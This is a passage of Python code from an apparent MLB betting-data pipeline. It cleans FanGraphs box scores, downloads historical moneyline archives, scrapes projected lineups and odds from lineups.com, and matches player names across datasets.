len(x.columns)):\r\n\t\t\t\tif data_types[j] == np.float64 or data_types[j] == np.int64:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\t\telse:\r\n\t\t\t\t\tm = x.columns[j]\r\n\r\n\t\t\t\t\tif (\"%\" in m and not \"NaN\" in m) or m == \"HR/FB\":\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tx[m] = x[m].str.replace(\"%\", \"\").astype(float) / 100\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tproblem = [k for k, x in enumerate(list(x[m])) if \",\" in x]\t\r\n\t\t\t\t\t\t\tindex_col = np.where(x.columns == m)[0][0]\r\n\t\t\t\t\t\t\tx.iloc[problem, index_col] = \"0.0%\"\r\n\r\n\t\t\t\t\t\t\tx[m] = x[m].str.replace(\"%\", \"\").astype(float) / 100\r\n\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tx[m] = x[m].astype(float)\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tcontinue\r\n\r\n\r\n\t\t\t#Fix column_names\r\n\t\t\tcolnames = list(x.columns)\r\n\t\t\tfor j in range(0, len(colnames)):\r\n\r\n\t\t\t\tif colnames[j][0] == \"-\":\r\n\t\t\t\t\tcolnames[j] = colnames[j][1:] + \"_minus\"\r\n\t\t\t\telif x.columns[j][0] == \"+\":\r\n\t\t\t\t\tcolnames[j] = colnames[j][1:] + \"_plus\"\t\t\r\n\r\n\t\t\tx.columns = colnames\t\t\r\n\r\n\r\n\t\t\t#Add position variable\r\n\t\t\t#Only for bat\r\n\t\t\ttry:\r\n\r\n\t\t\t\tsplitted_names = pd.DataFrame(list(x[\"Name\"].str.split(\" - \")), columns = [\"Name\", \"Position\"])\r\n\r\n\t\t\t\tx[\"Name\"] = (splitted_names[\"Name\"] + \" \" + x[\"Team\"]).str.replace(\" \", \"\")\r\n\r\n\t\t\t\ttemp = list(set(list(splitted_names[\"Position\"])))\r\n\r\n\t\t\t\tpositions = list()\r\n\t\t\t\tfor values in temp:\r\n\r\n\t\t\t\t\ty = values.split(\"-\")\r\n\t\t\t\t\tfor vals in y:\r\n\t\t\t\t\t\tif not vals in positions:\r\n\t\t\t\t\t\t\tpositions.append(vals)\r\n\r\n\t\t\t\tposition_names = []\r\n\r\n\t\t\t\tfor values in positions:\r\n\t\t\t\t\tc_name = \"Position_\" + values\r\n\t\t\t\t\tx[c_name] = 0\r\n\t\t\t\t\tposition_names.append(c_name)\r\n\r\n\r\n\t\t\t\tfor j in range(0, len(x)):\r\n\r\n\t\t\t\t\ty = splitted_names[\"Position\"][j].split(\"-\")\r\n\t\t\t\t\tfor values in y:\r\n\t\t\t\t\t\tc_name = \"Position_\" + values\r\n\t\t\t\t\t\tx.at[j, c_name] = 1\r\n\r\n\t\t\t\tframes[i] = x.sort_values(\"Date\", ascending=False)\r\n\r\n\t\t\texcept:\r\n\r\n\t\t\t\tsplitted_names = pd.DataFrame(list(x[\"Name\"].str.split(\"(\")), columns = [\"Name\", \"Position\"])\r\n\t\t\t\tx[\"Name\"] = (splitted_names[\"Name\"] + \" \" + x[\"Team\"]).str.replace(\" \", \"\")\r\n\t\t\t\tframes[i] = x.sort_values(\"Date\", ascending=False)\r\n\r\n\r\n\t\tscores = scores.sort_values(\"Date\", ascending = False)\r\n\t\tfor i in range(0, 2):\r\n\t\t\tframes[i] = frames[i].sort_values(\"Date\", ascending = False)\r\n\r\n\t\t#Save the cleaned files\r\n\t\tfor i in range(0, 2):\r\n\t\t\tsave_path = self.paths[i] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tframes[i].to_csv(save_path, index = False)\r\n\t\t\tprint(\"Saved:\" + \"\\t\" + save_path)\r\n\r\n\t\tsave_path = self.paths[2] + \"/Clean_Data/FanGraphs_Scores.csv\"\r\n\t\tscores = scores.sort_values(\"Date\", ascending=False)\r\n\t\tscores.to_csv(save_path, index = False)\r\n\t\tprint(\"Saved:\" + \"\\t\" + save_path)\r\n\r\n\r\n\t\tprint(\"Cleaning done.\")\r\n\r\n\r\n\t#Cleans betting data\r\n\tdef Clean_Betting_Data(self):\r\n\r\n\t\t#Set sub-directory up\r\n\t\tpath_data = self.paths[3] + \"/Clean_Data\"\r\n\t\tif not path.exists(path_data):\r\n\t\t\tos.mkdir(path_data)\r\n\t\t\tprint(\"Created sub-directory at:\" + \"\\t\" + path_data)\r\n\r\n\t\t#Extract CSV files if needed\r\n\t\turl = \"https://www.sportsbookreviewsonline.com/scoresoddsarchives/mlb/mlboddsarchives.htm\"\r\n\t\thtml = requests.get(url).content\r\n\t\thtml_content = BeautifulSoup(html, 'lxml')\r\n\t\tlinks = html_content.findAll('a')\r\n\r\n\t\tfile_url = []\r\n\t\tfor link in links:\r\n\t\t\ttry:\r\n\t\t\t\thref = link.attrs['href']\r\n\t\t\texcept:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif \".xlsx\" in href:\r\n\t\t\t\tfile_url.append(str(\"https://www.sportsbookreviewsonline.com/scoresoddsarchives/mlb/\" + href))\r\n\r\n\r\n\t\tfor x in file_url:\r\n\r\n\t\t\tyear = x.split(\"%\")[-1].split(\".\")[0][2:]\r\n\t\t\tpath_save = self.paths[3] + \"/MLB_Odds_\" + str(year) + \".csv\"\r\n\t\t\tif not path.exists(path_save):\r\n\r\n\t\t\t\tfile = pd.read_excel(x)\r\n\t\t\t\tfile.to_csv(path_save, index = False)\r\n\t\t\t\tprint(\"Downloaded:\" + \"\\t\" + path_save)\r\n\r\n\r\n\r\n\r\n\t\tFG_teams = []\r\n\t\tFG_teams = np.array(FG_teams)\r\n\t\tall_teams = np.array(list(set(list(FG_teams))))\r\n\t\tteam_index = []\r\n\t\tfor teams in all_teams:\r\n\t\t\tteam_index.append(np.where(FG_teams == teams)[0])\r\n\r\n\r\n\t\t#Format the files\r\n\t\tframe = []\r\n\r\n\t\tfor i in tqdm(range(2010, (datetime.now().year + 1))):\r\n\r\n\t\t\tpath_check = self.paths[3] + \"/MLB_Odds_\" + str(i) + \".csv\"\r\n\t\t\tif path.exists(path_check):\r\n\r\n\t\t\t\ttemp = pd.read_csv(path_check).reset_index(drop = True)\r\n\r\n\t\t\t\t#Fix dates\r\n\t\t\t\ttemp[\"Date\"] = temp[\"Date\"].astype(str)\r\n\r\n\t\t\t\tfor j in range(0, len(temp)):\r\n\t\t\t\t\tu = temp.at[j, \"Date\"]\r\n\t\t\t\t\tif len(temp.at[j, \"Date\"]) == 3:\r\n\t\t\t\t\t\ttemp.at[j, \"Date\"] = str(i) + \"-\" + \"0\" + u[0] + \"-\" + u[1:]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttemp.at[j, \"Date\"] = str(i) + \"-\" + u[0:2] + \"-\" + u[2:]\r\n\r\n\r\n\t\t\t\t#Convert moneyline values to returns\r\n\t\t\t\tmoneylines = [\"Open\", \"Close\"]\r\n\r\n\t\t\t\trmv = np.where(temp[\"Open\"] == \"NL\")[0]\r\n\t\t\t\tif len(rmv) > 0:\r\n\t\t\t\t\ttemp = temp.drop(rmv)\r\n\t\t\t\t\ttemp = temp.reset_index(drop = True)\r\n\t\t\t\t\ttemp[\"Open\"] = temp[\"Open\"].astype(int)\r\n\t\t\t\t\ttemp[\"Close\"] = temp[\"Close\"].astype(int)\r\n\r\n\t\t\t\tfor vals in moneylines:\r\n\r\n\t\t\t\t\tm = np.where(temp.columns == vals)[0][0]\r\n\r\n\t\t\t\t\tindex = np.where(temp[vals] > 0)[0]\r\n\t\t\t\t\ttemp.iloc[index, m] = temp.iloc[index, m] / 100\r\n\r\n\t\t\t\t\tindex = np.where(temp[vals] < 0)[0]\r\n\t\t\t\t\ttemp.iloc[index, m] = 100 / (- temp.iloc[index, m])\t\t\t\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\tsplit_frames = []\r\n\t\t\t\tvalues = [\"H\", \"V\"]\r\n\t\t\t\ttemp = temp[[\"Date\", \"Team\", \"Open\", \"Close\", \"VH\", \"Final\", \"Pitcher\"]]\r\n\r\n\t\t\t\ttemp[\"Pitcher\"] = temp[\"Pitcher\"].str.replace(\"-L\", \"\").str.replace(\"-R\", \"\")\r\n\t\t\t\tfor j in range(0, len(temp)):\r\n\t\t\t\t\ttemp.at[j, \"Pitcher\"] = str(temp.at[j, \"Pitcher\"])[1:]\r\n\r\n\t\t\t\t#Translate team names\r\n\t\t\t\ttemp = self.Fix_Team_Names(temp, \"City\")\r\n\t\t\t\ttemp = temp.reset_index(drop = True)\r\n\r\n\r\n\t\t\t\tfor vals in values:\r\n\r\n\t\t\t\t\tindex = np.where(temp[\"VH\"] == vals)[0]\r\n\t\t\t\t\tsplit_frames.append(temp.iloc[index, :])\r\n\t\t\t\t\tdel split_frames[-1][\"VH\"]\r\n\r\n\t\t\t\t\tif vals == \"H\":\r\n\t\t\t\t\t\tsplit_frames[-1].columns = [\"Date\", \"Team_Home\", \"Open_Home\", \"Close_Home\", \"Score_Home\", \"Pitcher_Home\"]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tsplit_frames[-1].columns = [\"Date\", \"Team_Away\", \"Open_Away\", \"Close_Away\", \"Score_Away\", \"Pitcher_Away\"]\r\n\t\t\t\t\t\tdel split_frames[-1][\"Date\"]\r\n\r\n\t\t\t\t\tsplit_frames[-1] = split_frames[-1].reset_index(drop = True)\r\n\r\n\t\t\t\t#Assemble\r\n\t\t\t\ttemp = pd.concat(split_frames, axis = 1)\r\n\r\n\t\t\t\t#Compute implied odds\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Home\"] = 1 / (1 + temp[\"Open_Home\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Home\"] = 1 / (1 + temp[\"Close_Home\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Away\"] = 1 / (1 + temp[\"Open_Away\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Away\"] = 1 / (1 + temp[\"Close_Away\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Home\"] = temp[\"Open_Winning_Odds_Home\"] / (temp[\"Open_Winning_Odds_Home\"] + temp[\"Open_Winning_Odds_Away\"])\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Home\"] = temp[\"Close_Winning_Odds_Home\"] / (temp[\"Close_Winning_Odds_Home\"] + temp[\"Close_Winning_Odds_Away\"])\r\n\r\n\t\t\t\ttemp[\"Open_Winning_Odds_Away\"] = 1 - temp[\"Open_Winning_Odds_Home\"]\r\n\t\t\t\ttemp[\"Close_Winning_Odds_Away\"] = 1 - temp[\"Close_Winning_Odds_Home\"]\r\n\r\n\r\n\t\t\t\tif len(frame) == 0:\r\n\t\t\t\t\tframe = temp\r\n\t\t\t\telse:\r\n\t\t\t\t\tframe = frame.append(temp)\r\n\r\n\r\n\t\tframe = frame.iloc[::-1]\r\n\t\tframe = frame.reset_index(drop = True)\r\n\r\n\r\n\t\t#Attempt to add IDs\r\n\t\tpath_scores = self.paths[2] + \"/Clean_Data/FanGraphs_Scores.csv\"\r\n\t\tif path.exists(path_scores):\r\n\r\n\t\t\tprint(\"\\t\" + \"\\t\" + \"\\t\" + \"***** Adding IDs *****\")\r\n\r\n\t\t\tframe[\"ID\"] = 0\r\n\t\t\tscores = pd.read_csv(path_scores)\r\n\r\n\t\t\tfor i in tqdm(range(0, len(scores))):\r\n\r\n\t\t\t\ta = np.where(frame[\"Date\"] == scores.at[i, \"Date\"])[0]\r\n\t\t\t\tif len(a) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tb = np.where(frame[\"Team_Home\"][a] == scores.at[i, \"Team_Home\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ta = a[b]\r\n\r\n\t\t\t\tb = np.where(frame[\"Score_Home\"][a] == scores.at[i, \"Score_Home\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ta = a[b]\r\n\r\n\t\t\t\tb = np.where(frame[\"Score_Away\"][a] == scores.at[i, \"Score_Away\"])[0]\r\n\t\t\t\tif len(b) == 0:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\tindex = a[b]\r\n\r\n\t\t\t\tif len(index) > 0:\r\n\t\t\t\t\tframe.at[index[0], \"ID\"] = scores.at[i, \"ID\"]\r\n\r\n\r\n\t\trmv = np.where(frame[\"ID\"] == 0)[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tframe = frame.drop(rmv)\r\n\r\n\r\n\t\tframe.to_csv(self.paths[3] + \"/Clean_Data/MLB_Odds.csv\", index = False)\r\n\t\tprint(\"\\t\" + \"\\t\" + \"***** MLB Moneyline data successfully formated *****\")\r\n\r\n\r\n\r\n\tdef Build_Filling_Pitchers_Database(self):\r\n\r\n\t\tframe_path = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(frame_path):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + frame_path)\r\n\r\n\t\tframe = pd.read_csv(frame_path)\r\n\t\t\r\n\t\tindex = np.where(frame[\"Starting\"] == \"No\")[0]\r\n\t\tframe.loc[index, \"Name\"] = \"ReliefPitcher\" + frame.iloc[index][\"Name\"].str[-3:].copy()\r\n\r\n\t\tframe.to_csv(self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores_SP.csv\", index = False)\r\n\r\n\r\n\t##############################################################################\r\n\t#################### PREDICTED LINEUPS AND MONEYLINES #######################\r\n\t##############################################################################\r\n\r\n\tdef Scrape_Predicted_Lineups(self):\r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\r\n\t\tprint(\"Accessing https://www.lineups.com/mlb/lineups ...\")\r\n\r\n\t\t#Extract projected roosters\r\n\t\thtml = requests.get(\"https://www.lineups.com/mlb/lineups\" , stream = True, headers = headers).content\r\n\t\ttables = pd.read_html(html)\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\r\n\t\tprint(\"Extracting tables ...\")\r\n\t\t#Extract full player names\r\n\t\tplayers_hrefs = soup.find_all(\"a\", class_ = \"link-black-underline\")\r\n\t\tplayers = []\r\n\t\tfamily_names = []\r\n\t\tfor element in players_hrefs:\r\n\t\t\tif \"player-stats\" in element[\"href\"]:\r\n\r\n\t\t\t\ttemp = element[\"href\"].split(\"/\")[-1].split(\"-\")\r\n\t\t\t\tout = \"\"\r\n\t\t\t\tfor x in temp:\r\n\t\t\t\t\tout = out + x.capitalize()\r\n\r\n\t\t\t\tplayers.append(out)\r\n\r\n\t\t\t\tif temp[-1].capitalize() == \"Jr\":\r\n\t\t\t\t\tfamily_names.append(temp[-2].capitalize() + temp[-1].capitalize())\r\n\t\t\t\telse:\r\n\t\t\t\t\tfamily_names.append(temp[-1].capitalize())\r\n\r\n\r\n\t\tfamily_names = np.array(family_names)\r\n\r\n\t\t#Extract moneylines\r\n\t\tmoneylines = soup.find_all(\"div\", class_ = \"lineup-foot-stat-col\")\r\n\r\n\t\t#Extract the date\r\n\t\ttemp = soup.find(\"span\", class_ = \"hidden-xs-down\").text.split(\" \")[-1].split(\"/\")\r\n\t\tfor i in range(0, len(temp)):\r\n\t\t\tif len(temp[i]) == 1:\r\n\t\t\t\ttemp[i] = \"0\" + temp[i]\r\n\t\tdate = str(2000 + int(temp[2])) + \"-\" + temp[0] + \"-\" + temp[1]\r\n\r\n\r\n\r\n\t\t#Build tables in loop\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\t\tteams = []\r\n\r\n\t\tprint(\"Formating tables ...\")\r\n\r\n\t\tn = int(len(tables) / 2)\r\n\t\tfor i in range(0, n):\r\n\r\n\t\t\t#Get batters\r\n\t\t\tbatters = pd.DataFrame(tables[2*i]).iloc[:,0].copy()\r\n\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\tbatters[j] = batters[j].split(str(j+1) + \".\")[1].split(\",\")[0].replace(\" \", \"\")\r\n\t\t\t\tk = int(len(batters[j])/2)\r\n\t\t\t\tbatters[j] = batters[j][0:k]\r\n\r\n\t\t\tbatters = pd.DataFrame(batters)\r\n\r\n\t\t\tteam_temp = batters.columns[0].replace(\"Hitters\", \"\").strip()\r\n\t\t\tteams.append(team_temp)\r\n\r\n\t\t\tbatters.columns = [\"Abreviated_Name\"]\r\n\t\t\tbatters[\"Full_Name\"] = \"\"\r\n\r\n\t\t\t#Jr. bug fix\r\n\t\t\tfam = batters[\"Abreviated_Name\"].str.split(\".\", expand = True)\r\n\t\t\tif None in list(fam.iloc[:,-1]):\r\n\t\t\t\tfam.drop(fam.columns[len(fam.columns) - 1], axis = 1, inplace = True)\r\n\r\n\r\n\t\t\tbatters[\"Family_Name\"] = list(fam.iloc[:,-1])\r\n\r\n\t\t\t#Get full names\r\n\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\tindex = np.where(family_names == batters.at[j, \"Family_Name\"])[0]\r\n\r\n\t\t\t\tif len(index) > 0:\r\n\t\t\t\t\tm = int(index[0])\r\n\t\t\t\t\tbatters.at[j, \"Full_Name\"] = players[m]\r\n\t\t\t\t\tfamily_names = np.delete(family_names, m)\r\n\t\t\t\t\tplayers = np.delete(players, m)\r\n\r\n\r\n\r\n\t\t\tbatters[\"Team\"] = team_temp\r\n\r\n\t\t\tpitchers = pd.DataFrame(tables[2*i + 1]).iloc[0,0].split(\" \")[0].replace(\" \", \"\")\r\n\t\t\tpitchers = pd.DataFrame([pitchers], columns = [\"Abreviated_Name\"])\r\n\r\n\t\t\t#Jr. bug fix\r\n\t\t\tfam = pitchers[\"Abreviated_Name\"].str.split(\".\", expand = True)\r\n\t\t\tif None in list(fam.iloc[:,-1]):\r\n\t\t\t\tfam.drop(fam.columns[len(fam.columns) - 1], axis = 1, inplace = True)\t\r\n\r\n\r\n\t\t\tpitchers[\"Family_Name\"] = list(fam.iloc[:,-1])\r\n\t\t\tpitchers[\"Full_Name\"] = \"\"\r\n\r\n\t\t\tindex = np.where(family_names == pitchers.at[0, \"Family_Name\"])[0]\r\n\t\t\tif len(index) > 0:\r\n\t\t\t\tm = int(index[0])\r\n\t\t\t\tpitchers.at[0, \"Full_Name\"] = players[m]\r\n\t\t\t\tfamily_names = np.delete(family_names, m)\r\n\t\t\t\tplayers = np.delete(players, m)\r\n\r\n\t\t\tpitchers[\"Team\"] = team_temp\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = batters\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(batters, ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pitchers\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pitchers, ignore_index = True)\r\n\r\n\r\n\r\n\t\tteams = np.array(teams)\r\n\r\n\t\t#Extract moneyline odds \r\n\t\tcurrent_moneylines = []\r\n\r\n\t\tfor i in range(0, int(len(moneylines)/4)):\r\n\r\n\t\t\ttemp = moneylines[4*i].find_all(\"p\", class_ = \"foot-stat-value\")\r\n\r\n\t\t\tfor j in range(0,2):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tcurrent_moneylines.append(int(temp[j].find_all(\"span\")[0].text))\r\n\t\t\t\texcept:\r\n\t\t\t\t\tcurrent_moneylines.append(100)\r\n\r\n\t\tcurrent_moneylines = np.array(current_moneylines)\r\n\r\n\r\n\r\n\t\t#Combine betting data\r\n\t\tindex_home = np.array(list(range(1,len(teams),2))).astype(int)\r\n\t\tindex_away = np.array(list(range(0,len(teams),2))).astype(int)\r\n\r\n\r\n\t\tbetting = pd.DataFrame(np.transpose([teams[index_home], \r\n\t\t\t\t\t\t\t\tcurrent_moneylines[index_home], \r\n\t\t\t\t\t\t\t\tteams[index_away], \r\n\t\t\t\t\t\t\t\tcurrent_moneylines[index_away]]),\r\n\t\t\t\t\t\t\t\tcolumns = [\"Team_Home\", \"MoneyLine_Home\", \"Team_Away\", \"MoneyLine_Away\"])\r\n\r\n\t\tbetting[\"Odds_Home\"] = 1/2\r\n\t\tbetting[\"Odds_Away\"] = 1/2\r\n\r\n\t\tbetting[\"MoneyLine_Home\"] = betting[\"MoneyLine_Home\"].astype(int)\r\n\t\tbetting[\"MoneyLine_Away\"] = betting[\"MoneyLine_Away\"].astype(int)\r\n\r\n\t\tfor i in range(0, len(betting)):\r\n\r\n\t\t\tif betting.at[i, \"MoneyLine_Home\"] >= 0:\r\n\t\t\t\tR = (100 + betting.at[i, \"MoneyLine_Home\"]) / 100\r\n\t\t\telse:\r\n\t\t\t\tR = -(100 - betting.at[i, \"MoneyLine_Home\"]) / betting.at[i, \"MoneyLine_Home\"]\r\n\t\t\t\t\r\n\t\t\tbetting.at[i, \"Odds_Home\"] = 1/R\r\n\r\n\t\t\tif betting.at[i, \"MoneyLine_Away\"] >= 0:\r\n\t\t\t\tR = (100 + betting.at[i, \"MoneyLine_Away\"]) / 100\r\n\t\t\telse:\r\n\t\t\t\tR = -(100 - betting.at[i, \"MoneyLine_Away\"]) / betting.at[i, \"MoneyLine_Away\"]\r\n\t\t\t\t\r\n\t\t\tbetting.at[i, \"Odds_Away\"] = 1/R\t\r\n\r\n\r\n\t\tbetting[\"Returns_Home\"] = 1 / betting[\"Odds_Home\"] - 1\r\n\t\tbetting[\"Returns_Away\"] = 1 / betting[\"Odds_Away\"] - 1\t\t\r\n\r\n\t\tbetting[\"OverOdds\"] = betting[\"Odds_Home\"] + betting[\"Odds_Away\"] - 1\r\n\r\n\r\n\t\t#Add Date\r\n\t\tbat[\"Date\"] = date\r\n\t\tpitch[\"Date\"] = date\r\n\t\tbetting[\"Date\"] = date\r\n\r\n\t\tbat = self.Fix_Team_Names(bat, \"City\")\r\n\t\tpitch = self.Fix_Team_Names(pitch, \"City\")\r\n\t\tbetting = self.Fix_Team_Names(betting, \"City\")\r\n\r\n\r\n\r\n\t\tdef find_name(frame, row, all_names):\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tf_name = str(frame.at[row, \"Full_Name\"]) + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tindex = np.where(dummy == f_name.lower())[0]\r\n\r\n\t\t\tif len(index) != 0:\r\n\t\t\t\treturn f_name\r\n\r\n\t\t\tp_name = str(frame.at[row, \"Family_Name\"]) + str(frame.at[row, \"Team\"])\r\n\t\t\tp_name = p_name.lower()\r\n\r\n\t\t\ttemp = str(frame.at[row, \"Family_Name\"])\r\n\t\t\tfamily_name = \"\".join([x for x in temp if x.isalpha()])\r\n\r\n\t\t\tfamily_name = family_name.lower()\r\n\t\t\tteam_name = str(frame.at[row, \"Team\"]).lower()\r\n\r\n\t\t\tm = []\r\n\t\t\tfor i in range(0, len(all_names)):\r\n\t\t\t\ttemp = \"\".join([x for x in dummy[i] if x.isalpha()])\r\n\r\n\t\t\t\tif (family_name in temp) and (team_name in temp):\r\n\t\t\t\t\tm.append(i) \r\n\t\t\t\t\t\r\n\r\n\t\t\tif len(m) == 0:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\t\tout = \"\"\r\n\r\n\t\t\tfor i in m:\r\n\t\t\t\ttemp = [x for x in all_names[i][0:len(all_names[i]) - 3] if x.isupper()]\r\n\t\t\t\tinitials = temp[0] + \".\" \r\n\t\t\t\tabreviated_name = initials + str(frame.at[row, \"Family_Name\"])\r\n\r\n\t\t\t\tif abreviated_name[-2:] == \"Jr\":\r\n\t\t\t\t\tabreviated_name = abreviated_name + \".\"\r\n\r\n\t\t\t\tif abreviated_name == str(frame.at[row, \"Abreviated_Name\"]):\r\n\t\t\t\t\tout = all_names[i]\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"KikeHernandez\":\r\n\t\t\t\treturn \"EnriqueHernandez\" + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"A.Toro-Hernandez\":\r\n\t\t\t\treturn \"AbrahamToro\" + str(frame.at[row, \"Team\"])\t\t\t\t\r\n\r\n\t\t\treturn out\r\n\r\n\r\n\r\n\r\n\t\tprint(\"Matching names (bat) ...\")\r\n\r\n\t\t#Match names with the original database\r\n\t\tpath_check = self.paths[0] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\r\n\t\tbat[\"Name_Key\"] = \"\"\r\n\t\tfor i in tqdm(range(0, len(bat))):\r\n\t\t\tbat.at[i, \"Name_Key\"] = find_name(bat, i, batters)\r\n\r\n\r\n\t\tprint(\"Matching names (pitch) ...\")\r\n\r\n\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_check)\r\n\r\n\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\tpitchers = np.array(list(set(list(pitchers))))\r\n\r\n\t\tpitch[\"Name_Key\"] = \"\"\r\n\t\tfor i in tqdm(range(0, len(pitch))):\r\n\t\t\tpitch.at[i, \"Name_Key\"] = find_name(pitch, i, pitchers)\r\n\r\n\r\n\r\n\t\tprint(\"Saving ...\")\r\n\r\n\t\t#Save\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + date \r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tbat.to_csv(path_check + \"/Bat.csv\", index = False)\r\n\t\tpitch.to_csv(path_check + \"/Pitch.csv\", index = False)\r\n\t\tbetting.to_csv(path_check + \"/Moneyline.csv\", index = False)\r\n\r\n\t\tprint(\"Data avaible at: \" + \"\\t\" + path_check)\r\n\r\n\r\n\r\n\r\n\tdef Merge_Predicted_Lineups(self):\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing directory at:\" + \"\\t\" + path_check)\r\n\r\n\t\tfiles_ext = [x for x in os.listdir(path_check) if \"-\" in x]\r\n\t\tif len(files_ext) == 0:\r\n\t\t\tsys.exit(\"No files to process:\" + \"\\t\" + path_check)\r\n\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\t\tmoneylines = []\r\n\r\n\t\tfor ext in files_ext:\r\n\r\n\t\t\tpath_load = path_check + \"/\" + ext\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = pd.read_csv(path_load + \"/Bat.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(pd.read_csv(path_load + \"/Bat.csv\"), ignore_index=True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pd.read_csv(path_load + \"/Pitch.csv\")\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pd.read_csv(path_load + \"/Pitch.csv\"), ignore_index=True)\t\t\r\n\r\n\t\t\tif len(moneylines) == 0:\r\n\t\t\t\tmoneylines = pd.read_csv(path_load + \"/Moneyline.csv\")\r\n\t\t\telse:\r\n\t\t\t\tmoneylines = moneylines.append(pd.read_csv(path_load + \"/Moneyline.csv\"), ignore_index=True)\r\n\r\n\t\tdef find_name(frame, row, all_names):\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tf_name = str(frame.at[row, \"Full_Name\"]) + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tindex = np.where(dummy == f_name.lower())[0]\r\n\r\n\t\t\tif len(index) != 0:\r\n\t\t\t\treturn f_name\r\n\r\n\t\t\tp_name = str(frame.at[row, \"Family_Name\"]) + str(frame.at[row, \"Team\"])\r\n\t\t\tp_name = p_name.lower()\r\n\r\n\t\t\ttemp = str(frame.at[row, \"Family_Name\"])\r\n\t\t\tfamily_name = \"\".join([x for x in temp if x.isalpha()])\r\n\r\n\t\t\tfamily_name = family_name.lower()\r\n\t\t\tteam_name = str(frame.at[row, \"Team\"]).lower()\r\n\r\n\t\t\tm = []\r\n\t\t\tfor i in range(0, len(all_names)):\r\n\t\t\t\ttemp = \"\".join([x for x in dummy[i] if x.isalpha()])\r\n\r\n\t\t\t\tif (family_name in temp) and (team_name in temp):\r\n\t\t\t\t\tm.append(i) \r\n\t\t\t\t\t\r\n\r\n\t\t\tif len(m) == 0:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\t\tout = \"\"\r\n\r\n\t\t\tfor i in m:\r\n\t\t\t\ttemp = [x for x in all_names[i][0:len(all_names[i]) - 3] if x.isupper()]\r\n\t\t\t\tinitials = temp[0] + \".\" \r\n\t\t\t\tabreviated_name = initials + str(frame.at[row, \"Family_Name\"])\r\n\r\n\t\t\t\tif abreviated_name[-2:] == \"Jr\":\r\n\t\t\t\t\tabreviated_name = abreviated_name + \".\"\r\n\r\n\t\t\t\tif abreviated_name == str(frame.at[row, \"Abreviated_Name\"]):\r\n\t\t\t\t\tout = all_names[i]\r\n\t\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == 